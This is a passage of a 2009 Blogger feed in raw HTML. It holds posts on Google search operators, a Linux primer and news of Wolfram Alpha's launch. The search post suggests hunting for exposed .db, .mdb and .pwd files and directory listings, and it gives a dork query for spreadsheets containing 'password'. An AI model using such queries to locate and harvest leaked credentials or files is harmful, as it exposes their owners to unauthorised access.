name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} p 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p&gt;&lt;b&gt;&lt;span style="font-size: 14pt;"&gt;Google Search Options&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 14pt;"&gt;&lt;br /&gt;&lt;br /&gt;Specific file types: *.xls, *.doc, *.pdf *.ps *.ppt *.rtf&lt;br /&gt;Google allows you to search for specific file types, so instead of getting html-files as a result (websites) you get Microsoft excel files for example. The search string you would use would be this:&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Filetype&lt;/b&gt;:xls (for excel files) or filetype:doc for word files.&lt;br /&gt;But maybe more interesting would be searching for *.db files and *.mdb files. Google by the way doesn’t tell you, you can search for *.db and *mdb files. I wonder what other file types one can search for. Things that come to mind are *.cfg files or *.pwd files, *.dat files, stuff like that. Try and think of something that might get you some interesting results.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Inurl&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Another useful search option is the inurl: option which allows one to search for a certain word one would want to be in the url. This gives you the opportunity to search for specific directories/folders, especially in combination with the “index of” option. An example would be inurl:master-tricks which would give you results of website urls that have the word “master-tricks” in the url.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Index of&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;The index of option is another option that isn’t especially thought of by the creators of google, but comes in very handy. If you use the “index of” string you will find directory listings of specific folders on servers. An example could be: "index of” master-tricks or index.of.master-tricks which would get you many directory listings of master-tricks folders. (don’t forget to use the quotes in this case since you are looking for the entire “index of” string, not just for “index” and “of”)&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Site&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;The site option allows you to come up with results that only belong to a certain domain name extension or to a specific site. For example one could search for .com sites or .box.sk sites or .nl sites, but also for results from just one site. An example of a search string would be: Site:org&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Intitle&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Intitle is another nice option. It allows you to search for html files that have a certain word or words in the title. The format would be intitle:wordhere.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Link&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;The Link option allows you to check which sites link to a specific site. For example link:http://pratikthorve.blogspot.com&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Combining search options&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;The above mentioned search options might or might not be known to you, but even though they can amount to some interesting results, it’s a fact that when you start combining them, that’s when google’s magic starts to show. For example, one could try this search string: inurl:master-tricks intitle:master-tricks or this one: site:org filetype:xls "password" .&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt; &lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-2694387007082795324?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/2694387007082795324/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/05/get-most-from-google-search.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/2694387007082795324'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/2694387007082795324'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/05/get-most-from-google-search.html' title='Get most from GOOGLE search'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_T53992hHLOM/Sgbjehbt2NI/AAAAAAAAAKQ/WGlVJkooTkY/s72-c/mothersday09.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-6325114090706101591</id><published>2009-05-08T07:24:00.000-07:00</published><updated>2009-05-08T07:57:23.569-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='general'/><title type='text'>LINUX</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_T53992hHLOM/SgRB9lpcePI/AAAAAAAAAKI/udSOIyJMZRE/s1600-h/red-hat-enterprise-linux-5.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 320px;" src="http://1.bp.blogspot.com/_T53992hHLOM/SgRB9lpcePI/AAAAAAAAAKI/udSOIyJMZRE/s400/red-hat-enterprise-linux-5.jpg" alt="" id="BLOGGER_PHOTO_ID_5333460385047279858" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Font Definitions */  @font-face 	{font-family:Wingdings; 	panose-1:5 0 0 0 0 0 0 0 0 0; 	mso-font-charset:2; 	mso-generic-font-family:auto; 	mso-font-pitch:variable; 	mso-font-signature:0 268435456 0 0 -2147483648 0;}  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} p 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;}  /* List Definitions */  @list l0 	{mso-list-id:1887255004; 	mso-list-template-ids:-1212391240;} @list l0:level1 	{mso-level-number-format:bullet; 	mso-level-text:; 	mso-level-tab-stop:.5in; 	mso-level-number-position:left; 	text-indent:-.25in; 	mso-ansi-font-size:10.0pt; 	font-family:Symbol;} @list l1 	{mso-list-id:2078435768; 	mso-list-template-ids:219180666;} @list l1:level1 	{mso-level-number-format:bullet; 	mso-level-text:; 	mso-level-tab-stop:.5in; 	mso-level-number-position:left; 	text-indent:-.25in; 	mso-ansi-font-size:10.0pt; 	font-family:Symbol;} ol 	{margin-bottom:0in;} ul 	{margin-bottom:0in;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p&gt;&lt;span style="font-size:130%;"&gt;&lt;strong&gt;&lt;span style=";font-family:Arial;" &gt;Linux&lt;/span&gt;&lt;/strong&gt;&lt;/span&gt;&lt;span style=";font-family:Arial;font-size:130%;"  &gt; is an operating system -- very much like &lt;strong&gt;&lt;span style="font-family:Arial;"&gt;UNIX&lt;/span&gt;&lt;/strong&gt; -- that has become very popular over the last several years.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style=";font-family:Arial;font-size:130%;"  &gt;Operating systems are computer programs. An operating system is the first piece of software that the computer executes when you turn the machine on. The operating system loads itself into memory and begins managing the resources available on the computer. It then provides those resources to other applications that the user wants to execute. Typical services that an operating system provides include: &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:130%;"  &gt;A task scheduler - The task scheduler is able to      allocate the execution of the CPU to a number of different tasks. Some of      those tasks are the different applications that the user is running, and      some of them are operating system tasks. The task scheduler is the part of      the operating system that lets you print a document from your word      processor in one window while you are downloading a file in another window      and recalculating a spreadsheet in a third window. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:130%;"  &gt;A memory manager - The memory manager controls the      system's RAM and normally creates a larger virtual memory space using a      file on the hard disk.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:130%;"  &gt;&lt;span style=""&gt; &lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;span style="font-size:130%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:130%;"  &gt;A disk manager - The disk manager creates and maintains      the directories and files on the disk. When you request a file, the disk      manager brings it in from the disk. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:130%;"  &gt;A network manager - The network manager controls all      data moving between the computer and the network. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:130%;"  &gt;Other I/O services manager - The OS manages the      keyboard, mouse, video display, printers, etc. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:130%;"  &gt;Security manager - The OS maintains the security of the      information in the computer's files and controls who can access the      computer. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;  &lt;p&gt;&lt;span style=";font-family:Arial;font-size:130%;"  &gt;An operating system normally also provides the default user interface for the system. The standard "look" of Windows 98 includes the Start button, the task bar, etc. The Mac OS provides a completely different look and feel for Macintosh computers.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style=";font-family:Arial;font-size:130%;"  &gt;Linux is as much a phenomenon as it is an operating system. To understand why Linux has become so popular, it is helpful to know a little bit about its history. The first version of UNIX was originally developed several decades ago and was used primarily as a research operating system in universities. High-powered desktop workstations from companies like Sun proliferated in the 1980s, and they were all based on UNIX. A number of companies entered the workstation field to compete against Sun: HP, IBM, Silicon Graphics, Apollo, etc. Unfortunately, each one had its own version of UNIX and this made the sale of software difficult. Windows NT was Microsoft's answer to this marketplace. NT provides the same sort of features as UNIX operating systems -- security, support for multiple CPUs, large-scale memory and disk management, etc. -- but it does it in a way that is compatible with most Windows applications. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style=";font-family:Arial;font-size:130%;"  &gt;The entry of Microsoft into the high-end workstation arena created a strange dynamic. The proprietary operating systems owned by separate companies and the lack of a central authority in the UNIX world weaken UNIX, but many people have personal problems with Microsoft. Linux stepped into this odd landscape and captured a lot of attention. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style=";font-family:Arial;font-size:130%;"  &gt;The Linux kernel, created by &lt;strong&gt;&lt;span style="font-family:Arial;"&gt;Linus Torvalds&lt;/span&gt;&lt;/strong&gt;, was made available to the world for free. Torvalds then invited others to add to the kernel provided that they keep their contributions free. Thousands of programmers began working to enhance Linux, and the operating system grew rapidly. Because it is free and runs on PC platforms, it gained a sizeable audience among hard-core developers very quickly. Linux has a dedicated following and appeals to several different kinds of people: &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:130%;"  &gt;People who already know UNIX and want to run it on      PC-type hardware &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:130%;"  &gt;People who want to experiment with operating system      principles &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:130%;"  &gt;People who need or want a great deal of control over      their operating system &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:130%;"  &gt;People who have personal problems with Microsoft &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;  &lt;p&gt;&lt;span style=";font-family:Arial;font-size:14;"  &gt;&lt;span style="font-size:130%;"&gt;In general, Linux is harder to manage than something like Windows, but offers more flexibility and configuration options.&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-6325114090706101591?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/6325114090706101591/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/05/normal-0-false-false-false.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/6325114090706101591'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/6325114090706101591'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/05/normal-0-false-false-false.html' title='LINUX'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_T53992hHLOM/SgRB9lpcePI/AAAAAAAAAKI/udSOIyJMZRE/s72-c/red-hat-enterprise-linux-5.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-3154561785524778367</id><published>2009-05-07T09:39:00.000-07:00</published><updated>2009-05-07T09:52:26.526-07:00</updated><title type='text'>AN INVENTION THAT COULD CHANGE THE INTERNET FOR EVER</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_T53992hHLOM/SgMQBIUK94I/AAAAAAAAAKA/TNYIxjRyEzE/s1600-h/harvard.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 272px;" src="http://4.bp.blogspot.com/_T53992hHLOM/SgMQBIUK94I/AAAAAAAAAKA/TNYIxjRyEzE/s400/harvard.jpg" alt="" id="BLOGGER_PHOTO_ID_5333123995334801282" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;                                 &lt;span style="font-style: italic; font-weight: bold;"&gt;Harvard University where this concept was first tested&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;Revolutionary new web software could put giants such as Google in the shade when it comes out later this month. Andrew Johnson reports&lt;br /&gt;The biggest internet revolution for a generation will be unveiled this month with the launch of software that will understand questions and give specific, tailored answers in a way that the web has never managed before.&lt;br /&gt;&lt;br /&gt;The new system, Wolfram Alpha, showcased at Harvard University in the US last week, takes the first step towards what many consider to be the internet's Holy Grail – a global store of information that understands and responds to ordinary language in the same way a person does.&lt;br /&gt;Although the system is still new, it has already produced massive interest and excitement among technology pundits and internet watchers.&lt;br /&gt;&lt;br /&gt;Computer experts believe the new search engine will be an evolutionary leap in the development of the internet. Nova Spivack, an internet and computer expert, said that Wolfram Alpha could prove just as important as Google. "It is really impressive and significant," he wrote. "In fact it may be as important for the web (and the world) as Google, but for a different purpose.&lt;br /&gt;&lt;br /&gt;Tom Simpson, of the blog Convergenceofeverything.com, said: "What are the wider implications exactly? A new paradigm for using computers and the web? Probably. Emerging artificial intelligence and a step towards a self-organising internet? Possibly... I think this could be big."&lt;br /&gt;Wolfram Alpha will not only give a straight answer to questions such as "how high is Mount Everest?", but it will also produce a neat page of related information – all properly sourced – such as geographical location and nearby towns, and other mountains, complete with graphs and charts.&lt;br /&gt;&lt;br /&gt;The real innovation, however, is in its ability to work things out "on the fly", according to its British inventor, Dr Stephen Wolfram. If you ask it to compare the height of Mount Everest to the length of the Golden Gate Bridge, it will tell you. Or ask what the weather was like in London on the day John F Kennedy was assassinated, it will cross-check and provide the answer. Ask it about D sharp major, it will play the scale. Type in "10 flips for four heads" and it will guess that you need to know the probability of coin-tossing. If you want to know when the next solar eclipse over Chicago is, or the exact current location of the International Space Station, it can work it out.&lt;br /&gt;&lt;br /&gt;Dr Wolfram, an award-winning physicist who is based in America, added that the information is "curated", meaning it is assessed first by experts. This means that the weaknesses of sites such as Wikipedia, where doubts are cast on the information because anyone can contribute, are taken out. It is based on his best-selling Mathematica software, a standard tool for scientists, engineers and academics for crunching complex maths.&lt;br /&gt;&lt;br /&gt;"I've wanted to make the knowledge we've accumulated in our civilisation computable," he said last week. "I was not sure it was possible. I'm a little surprised it worked out so well."&lt;br /&gt;&lt;br /&gt;Dr Wolfram, 49, who was educated at Eton and had completed his PhD in particle physics by the time he was 20, added that the launch of Wolfram Alpha later this month would be just the beginning of the project.&lt;br /&gt;&lt;br /&gt;"It will understand what you are talking about," he said. "We are just at the beginning. I think we've got a reasonable start on 90 per cent of the shelves in a typical reference library."&lt;br /&gt;&lt;br /&gt;The engine, which will be free to use, works by drawing on the knowledge on the internet, as well as private databases. Dr Wolfram said he expected that about 1,000 people would be needed to keep its databases updated with the latest discoveries and information.&lt;br /&gt;&lt;br /&gt;He also added that he would not go down the road of storing information on ordinary people, although he was aware that others might use the technology to do so.&lt;br /&gt;&lt;br /&gt;Wolfram Alpha has been designed with professionals and academics in mind, so its grasp of popular culture is, at the moment, comparatively poor. The term "50 Cent" caused "absolute horror" in tests, for example, because it confused a discussion on currency with the American rap artist. For this reason alone it is unlikely to provide an immediate threat to Google, which is working on a similar type of search engine, a version of which it launched last week.&lt;br /&gt;&lt;br /&gt;"We have a certain amount of popular culture information," Dr Wolfram said. "In some senses popular culture information is much more shallowly computable, so we can find out who's related to who and how tall people are. I fully expect we will have lots of popular culture information. There are linguistic horrors because if you put in books and music a lot of the names clash with other concepts."&lt;br /&gt;&lt;br /&gt;He added that to help with that Wolfram Alpha would be using Wikipedia's popularity index to decide what users were likely to be interested in.&lt;br /&gt;&lt;br /&gt;With Google now one of the world's top brands, worth $100bn, Wolfram Alpha has the potential to become one of the biggest names on the planet.&lt;br /&gt;&lt;br /&gt;Dr Wolfram, however, did not rule out working with Google in the future, as well as Wikipedia. "We're working to partner with all possible organisations that make sense," he said. "Search, narrative, news are complementary to what we have. Hopefully there will be some great synergies."&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-3154561785524778367?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/3154561785524778367/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/05/invention-that-could-change-internet.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/3154561785524778367'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/3154561785524778367'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/05/invention-that-could-change-internet.html' title='AN INVENTION THAT COULD CHANGE THE INTERNET FOR EVER'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_T53992hHLOM/SgMQBIUK94I/AAAAAAAAAKA/TNYIxjRyEzE/s72-c/harvard.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-7259030016140748421</id><published>2009-05-06T04:26:00.000-07:00</published><updated>2009-05-06T14:09:10.867-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Trivia&apos;s'/><title type='text'>OPEN SOURCE SOFTWARES</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_T53992hHLOM/SgF0K0gJonI/AAAAAAAAAJ4/6KkU2HoJESA/s1600-h/opensource_logo.gif"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 345px;" src="http://4.bp.blogspot.com/_T53992hHLOM/SgF0K0gJonI/AAAAAAAAAJ4/6KkU2HoJESA/s400/opensource_logo.gif" alt="" id="BLOGGER_PHOTO_ID_5332671163024384626" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;o:smarttagtype namespaceuri="urn:schemas-microsoft-com:office:smarttags" name="country-region"&gt;&lt;/o:smarttagtype&gt;&lt;o:smarttagtype namespaceuri="urn:schemas-microsoft-com:office:smarttags" name="PlaceName"&gt;&lt;/o:smarttagtype&gt;&lt;o:smarttagtype namespaceuri="urn:schemas-microsoft-com:office:smarttags" name="PlaceType"&gt;&lt;/o:smarttagtype&gt;&lt;o:smarttagtype namespaceuri="urn:schemas-microsoft-com:office:smarttags" name="place"&gt;&lt;/o:smarttagtype&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if !mso]&gt;&lt;object classid="clsid:38481807-CA0E-42D2-BF39-B33AF135CC4D" id="ieooui"&gt;&lt;/object&gt; &lt;style&gt; st1\:*{behavior:url(#ieooui) } &lt;/style&gt; &lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Font Definitions */  @font-face 	{font-family:Wingdings; 	panose-1:5 0 0 0 0 0 0 0 0 0; 	mso-font-charset:2; 	mso-generic-font-family:auto; 	mso-font-pitch:variable; 	mso-font-signature:0 268435456 0 0 -2147483648 0;}  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} p 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	